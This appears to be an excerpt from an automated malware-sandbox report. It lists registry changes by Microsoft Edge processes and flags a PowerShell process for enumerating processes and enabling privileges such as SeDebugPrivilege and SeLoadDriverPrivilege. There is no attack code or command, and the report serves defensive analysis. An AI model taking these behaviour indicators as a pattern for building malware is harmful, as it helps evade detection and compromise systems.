Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 70e131bf2cafda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = a037280fd2c9da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\ C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0a0cfd5dfaaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
